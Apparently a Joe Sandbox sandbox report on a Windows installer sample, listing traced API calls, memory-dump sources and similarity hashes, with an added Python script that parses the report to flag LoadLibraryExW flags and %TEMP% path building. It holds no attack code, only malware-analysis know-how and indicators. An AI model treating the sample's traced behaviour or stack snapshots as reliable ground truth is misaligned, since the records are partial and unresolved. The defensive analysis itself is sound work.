• RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: CloseCreateValuelstrlen
• String ID: C:\Program Files (x86)\edelweissen\romanblade.ini
• API String ID: 1356686001-3814320704
• Opcode ID: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
• Instruction ID: ae8cd99e4777b9a91f11086a6aa50b0fceabbd5df02328ddbc6dea80253d30cd
• Opcode Fuzzy Hash: 16e5a276120f12a6204aa0efacf74780f7bd9cd384b23bb9fa3ac2a5e5572d35
• Instruction Fuzzy Hash: 73119371A00109BFEB10EFA1DE49EAF7A7CEB40358F11403AF505B61D0DBB85D409B68
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B31
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402B6D
• RegCloseKey.ADVAPI32(?), ref: 00402B76
• RegCloseKey.ADVAPI32(?), ref: 00402B9B
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402BB9
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: Close$DeleteEnumOpen
• String ID:
• API String ID: 1912718029-0
• Opcode ID: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
• Instruction ID: 30c1bee4f6ef5540a549b97fb3682634b1066eef3f365ecf60e24fe04a280a9b
• Opcode Fuzzy Hash: 0457941ff5e224387652905fc39ee489005b0ae9b3b8e7e888a4b6cafeb9656e
• Instruction Fuzzy Hash: F6113A71500108BFDF109F90DE89DAE3B79EB44348F10447AFA15B11A0D7B9AE55AA18
APIs
• GetDlgItem.USER32(?,?), ref: 00401CEB
• GetClientRect.USER32(00000000,?), ref: 00401CF8
• LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
• SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
• DeleteObject.GDI32(00000000), ref: 00401D36
Memory Dump Source
• Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
• Opcode ID: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
• Instruction ID: 44b403d8ea142f61c46f59bdf5c6715f811f2d25bbd76591197da0c88fd97a40
• Opcode Fuzzy Hash: 9df21d8324280b954a21fe08bb3736f9504f12d3c69ac91fc64e9be1e30a0862
• Instruction Fuzzy Hash: 97F0E1B2600505BFD701DBA4EF88DDE7BBCEB08351F101465F642F1190CA749D418B38
                                                            APIs
                                                            • lstrlenW.KERNEL32(0042D1F8,0042D1F8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 0040486F
                                                            • wsprintfW.USER32 ref: 00404878
                                                            • SetDlgItemTextW.USER32(?,0042D1F8), ref: 0040488B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s
                                                            • API String ID: 3540041739-3551169577
                                                            • Opcode ID: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                            • Instruction ID: 9325b392590c5ef976e2008094ad60f82e4542d9ead9839402a3ec0ae1c12cd4
                                                            • Opcode Fuzzy Hash: d06d760b70d228034084ebfc2f1cf5957d804e34569ee8fe807cf6b5ccc94acb
                                                            • Instruction Fuzzy Hash: F01126336002243BDB10666D9C4AEEF3699DFC2335F144637FA25F60D0D979881186E8
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                            • Instruction ID: cdd208a87cf377e151b028b5bc2daf4d5ae5f0581749dcda0b9a9113f5b0b00f
                                                            • Opcode Fuzzy Hash: b96f059d8af19570658b4064743f3012e02bc4722dae05cd1bf66048136c1794
                                                            • Instruction Fuzzy Hash: 35216271A44109AFDF01AFB0DA4AAAE7A75EF44744F14403EF502B61D1DAB88590DB58
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                              • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
                                                              • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                            • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                            • String ID: OC
                                                            • API String ID: 334405425-1597561874
                                                            • Opcode ID: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                            • Instruction ID: a758f152f971d74a5f32e3130d7e663150c352659b46f9ca4e023949e3a286cd
                                                            • Opcode Fuzzy Hash: 1a63145c29d69d2f68bd0ff66438051318ef2c032ef63ab5126504a865d37410
                                                            • Instruction Fuzzy Hash: 0A21A771900216EBCF20AFA5CE49A9E7EB0AF09354F20413BF615B51E0D7BD8982DB5D
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004057B4
                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004057BE
                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 2659869361-297319885
                                                            • Opcode ID: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                            • Instruction ID: d5080c12e7ff52c275ddc2bb7fa08cb5908483c46ce1eaa0ff7902437740b8fb
                                                            • Opcode Fuzzy Hash: b020c05d1d51c63f00091095410932b3634663a013ea1a7813334113b3c7ff87
                                                            • Instruction Fuzzy Hash: 6ED05E31101E20AAC1116B549C08EDF66ACEE45300740802BF141B30A1D7781D418AFD
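Two of the records above are worth reading together: the function at 00401FC3 calls LoadLibraryExW with 00000008 in the dwFlags slot, and the function at 004057B4 builds a path that ends in C:\Users\user\AppData\Local\Temp\ before a lstrcatW. The flag value 0x00000008 is LOAD_WITH_ALTERED_SEARCH_PATH (Windows SDK, libloaderapi.h), which, when the DLL is given by absolute path, makes the loader resolve that DLL's own dependencies from its directory first, so a module dropped under %TEMP% can pull in neighbours from the same directory. The following script is an added example, not part of the Joe Sandbox report or of the sample: it parses the report's "APIs" lines (line format inferred from this page; the regex, function names and the ApiCall record are mine), decodes the LoadLibraryEx flag word against the SDK table, and lists every call whose stack arguments carry a path under \Temp\. The sample text is copied verbatim from the records above. One caveat the parser cannot remove: the bracketed values are stack-slot snapshots at call time, "?" marks an unresolved slot and the list is often longer than the function's real argument count (FreeLibrary takes one parameter, yet eight are shown), so a decoded flag is a lead to confirm in the disassembly, not a proven fact.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# LoadLibraryEx dwFlags values from the Windows SDK (libloaderapi.h).
LOADLIBRARYEX_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x00000020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x00000040: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x00000080: "LOAD_LIBRARY_REQUIRE_SIGNED_TARGET",
    0x00000100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x00000200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x00000400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x00001000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}

# Constructed sample: lines copied from the report records above.
SAMPLE = r"""
• GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FC3
  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
• FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
• wsprintfW.USER32 ref: 00404878
• lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004057B4
• CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004031C7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004057BE
• lstrcatW.KERNEL32(?,0040A014), ref: 004057D0
"""

# Line shape as seen on this page (assumed, not a documented format):
#   • Api.MODULE(arg,arg,...), ref: ADDR
#   • Api.MODULE ref: ADDR                      (no argument list)
#   • Part of subcall function ADDR: Api.MODULE(...), ref: ADDR
API_LINE = re.compile(
    r"•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s+ref:\s+(?P<ref>[0-9A-F]{8})"
)
HEX32 = re.compile(r"^[0-9A-F]{8}$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int for 8-digit hex slots, str for "?" or resolved strings
    ref: str              # call-site address
    subcall_of: Optional[str]


def parse_arg(token: str):
    token = token.strip()
    return int(token, 16) if HEX32.match(token) else token


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn the report's bullet lines into ApiCall records; other lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def decode_loadlibrary_flags(flags: int) -> List[str]:
    """Name every set bit of a LoadLibraryEx dwFlags word; unknown bits are kept visible."""
    names = [name for bit, name in LOADLIBRARYEX_FLAGS.items() if flags & bit]
    unknown = flags & ~sum(LOADLIBRARYEX_FLAGS)
    if unknown:
        names.append(f"UNKNOWN_0x{unknown:08X}")
    return names


def loadlibrary_findings(calls: List[ApiCall]):
    """(call-site, decoded flags) for each LoadLibraryEx* call whose third slot is numeric."""
    return [
        (c.ref, decode_loadlibrary_flags(c.args[2]))
        for c in calls
        if c.api in ("LoadLibraryExW", "LoadLibraryExA")
        and len(c.args) >= 3 and isinstance(c.args[2], int)
    ]


def temp_path_findings(calls: List[ApiCall]) -> List[str]:
    """Call sites whose stack snapshot carries a path ending in \\Temp\\ (case-insensitive)."""
    return sorted({
        c.ref for c in calls
        if any(isinstance(a, str) and a.lower().endswith("\\temp\\") for a in c.args)
    })


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for ref, names in loadlibrary_findings(parsed):
        print(f"LoadLibraryEx at {ref}: {', '.join(names)}")
    print("Temp-path builders at:", ", ".join(temp_path_findings(parsed)))
```

Feed it the whole "APIs" section of a report rather than the sample and the two lists line up the DLL-loading sites against the path-building sites; a hit in both from the same function, as here with 00401FD4 next to the %TEMP% builder, is the place to start when deciding what the first stage actually drops and loads.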
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000,00402E7B,00000001,?,?,?,00000000,004033FE,?), ref: 00402CAE
                                                            • GetTickCount.KERNEL32 ref: 00402CCC
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402C15,00000000), ref: 00402CE9
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,004033FE,?), ref: 00402CF7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                            • Instruction ID: 286efe5820fb8a572a90530028cebd71549732c65272ed0b190b82beaa7bbda7
                                                            • Opcode Fuzzy Hash: 414b6c420d43048d034e9a320e00181de91b17f8b621a4d3d9bbbd27fa16b9cf
                                                            • Instruction Fuzzy Hash: 6CF05E70606620BFD7216B24FF4D98F7A64F744B11B91043AF141B11E4C7B448C18BDC
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00404F9D
                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00404FEE
                                                              • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Window$CallMessageProcSendVisible
                                                            • String ID:
                                                            • API String ID: 3748168415-3916222277
                                                            • Opcode ID: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                            • Instruction ID: 5368250be3cb6e4106e80ca770201d47c576881e659a98db37bb9bc21f5752cc
                                                            • Opcode Fuzzy Hash: d5165aaa8ddedbb0149cdff99e62f7242478f10d326129f832a6699438a9a539
                                                            • Instruction Fuzzy Hash: 1A0184B150020AAFDF219F11DD81EAB3766EBC5755F104037FB00761D1CB7A8D62D669
                                                            APIs
